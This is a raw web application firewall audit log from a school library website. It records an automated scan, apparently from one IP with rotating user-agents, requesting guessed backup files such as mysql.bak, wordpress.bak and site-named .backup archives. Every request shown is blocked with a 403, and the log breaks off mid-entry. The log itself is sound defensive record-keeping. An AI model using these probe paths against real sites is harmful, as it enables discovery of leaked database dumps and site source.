"/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882152007 1723 (- - -) Stopwatch2: 1747543882152007 1723; combined=700, p1=331, p2=341, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19a8c83e-Z-- --95e6f767-A-- [18/May/2025:11:51:22 +0700] aClnShir-GlPrFVVKe5EzgAAAEk 103.236.140.4 56832 103.236.140.4 8181 --95e6f767-B-- GET /smkn22jakartaschid.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5; rv:52.5.2) Gecko/20100101 Firefox/52.5.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093275 --95e6f767-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --95e6f767-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882153330 1694 (- - -) Stopwatch2: 1747543882153330 1694; combined=686, p1=330, p2=326, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95e6f767-Z-- --f427da64-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8kQAAAAk 103.236.140.4 56796 103.236.140.4 8181 --f427da64-B-- GET /website.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686; rv:60.2.1) Gecko/20100101 Firefox/60.2.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 156303434 --f427da64-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f427da64-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882154753 1815 (- - -) Stopwatch2: 1747543882154753 1815; combined=667, p1=346, p2=294, p3=0, p4=0, p5=27, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f427da64-Z-- --ce168007-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cSxwAAAJM 103.236.140.4 56816 103.236.140.4 8181 --ce168007-B-- GET /files.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 OPR/56.0.3051.43 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224370 --ce168007-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ce168007-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882157665 1781 (- - -) Stopwatch2: 1747543882157665 1781; combined=739, p1=405, p2=305, p3=0, p4=0, p5=28, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce168007-Z-- --da9e1f16-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8kwAAAAw 103.236.140.4 56796 103.236.140.4 8181 --da9e1f16-B-- GET /2021.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 OPR/53.0.2907.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 156303448 --da9e1f16-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --da9e1f16-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882161491 1575 (- - -) Stopwatch2: 1747543882161491 1575; combined=627, p1=312, p2=286, p3=0, p4=0, p5=29, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da9e1f16-Z-- --79ab5c6a-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8lAAAAAc 103.236.140.4 56796 103.236.140.4 8181 --79ab5c6a-B-- GET /wordpress.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.5.0) Gecko/20100101 Firefox/60.5.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117609578 --79ab5c6a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --79ab5c6a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882163316 1625 (- - -) Stopwatch2: 1747543882163316 1625; combined=644, p1=305, p2=301, p3=0, p4=0, p5=37, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79ab5c6a-Z-- --ad57371d-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8lQAAAAE 103.236.140.4 56796 103.236.140.4 8181 --ad57371d-B-- GET /mysql.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1; rv:63.0.1) Gecko/20100101 Firefox/63.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117609597 --ad57371d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ad57371d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882174160 1881 (- - -) Stopwatch2: 1747543882174160 1881; combined=767, p1=419, p2=320, p3=0, p4=0, p5=27, sr=113, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad57371d-Z-- --25ff4d5e-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8lwAAABc 103.236.140.4 56796 103.236.140.4 8181 --25ff4d5e-B-- GET /orders.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1; rv:60.5.0) Gecko/20100101 Firefox/60.5.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117609609 --25ff4d5e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --25ff4d5e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882180450 1793 (- - -) Stopwatch2: 1747543882180450 1793; combined=662, p1=337, p2=298, p3=0, p4=0, p5=26, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25ff4d5e-Z-- --fd3c786c-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8mQAAAAU 103.236.140.4 56796 103.236.140.4 8181 --fd3c786c-B-- GET /site.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 110436669 --fd3c786c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --fd3c786c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882204736 1798 (- - -) Stopwatch2: 1747543882204736 1798; combined=690, p1=366, p2=298, p3=0, p4=0, p5=26, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd3c786c-Z-- --5209351f-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cSygAAAII 103.236.140.4 56816 103.236.140.4 8181 --5209351f-B-- GET /smkn22jakarta_sch_id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0 Safari/537.36 OPR/58.0.3135.127 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 70090861 --5209351f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5209351f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882205356 2119 (- - -) Stopwatch2: 1747543882205356 2119; combined=764, p1=354, p2=383, p3=0, p4=0, p5=27, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5209351f-Z-- --8a7e1550-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cSywAAAJc 103.236.140.4 56816 103.236.140.4 8181 --8a7e1550-B-- GET /new.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686; rv:53.0) Gecko/20100101 Firefox/53.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117609644 --8a7e1550-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8a7e1550-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882210305 1658 (- - -) Stopwatch2: 1747543882210305 1658; combined=666, p1=330, p2=295, p3=0, p4=0, p5=40, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a7e1550-Z-- --07c94d5f-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cSzAAAAIA 103.236.140.4 56816 103.236.140.4 8181 --07c94d5f-B-- GET /2010.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153190484 --07c94d5f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --07c94d5f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882214035 1618 (- - -) Stopwatch2: 1747543882214035 1618; combined=658, p1=339, p2=292, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07c94d5f-Z-- --30bf7c3e-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8mwAAABM 103.236.140.4 56796 103.236.140.4 8181 --30bf7c3e-B-- GET /old.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36 OPR/52.0.2871.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 110436683 --30bf7c3e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --30bf7c3e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882217177 1622 (- - -) Stopwatch2: 1747543882217177 1622; combined=664, p1=325, p2=311, p3=0, p4=0, p5=27, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30bf7c3e-Z-- --7ecd6f15-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8nAAAAA8 103.236.140.4 56796 103.236.140.4 8181 --7ecd6f15-B-- GET /2011.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.7.3) Gecko/20100101 Firefox/52.7.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224450 --7ecd6f15-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7ecd6f15-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882225615 1591 (- - -) Stopwatch2: 1747543882225615 1591; combined=631, p1=315, p2=288, p3=0, p4=0, p5=28, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ecd6f15-Z-- --aed04b7c-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8nwAAABY 103.236.140.4 56796 103.236.140.4 8181 --aed04b7c-B-- GET /index.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 OPR/51.0.2830.55 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224467 --aed04b7c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --aed04b7c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882243953 1782 (- - -) Stopwatch2: 1747543882243953 1782; combined=651, p1=305, p2=320, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aed04b7c-Z-- --aa1c1353-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8oAAAABU 103.236.140.4 56796 103.236.140.4 8181 --aa1c1353-B-- GET /html.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626 Safari/537.36 OPR/56.0.3051.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153190533 --aa1c1353-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --aa1c1353-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882246352 1903 (- - -) Stopwatch2: 1747543882246352 1903; combined=709, p1=343, p2=338, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa1c1353-Z-- --00d67309-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8owAAAA0 103.236.140.4 56796 103.236.140.4 8181 --00d67309-B-- GET /data.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 110436690 --00d67309-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --00d67309-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882262222 1704 (- - -) Stopwatch2: 1747543882262222 1704; combined=663, p1=318, p2=318, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00d67309-Z-- --e37d2a24-A-- [18/May/2025:11:51:22 +0700] aClnSkPRqak7bVuUS6cS0QAAAIg 103.236.140.4 56816 103.236.140.4 8181 --e37d2a24-B-- GET /2018.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: 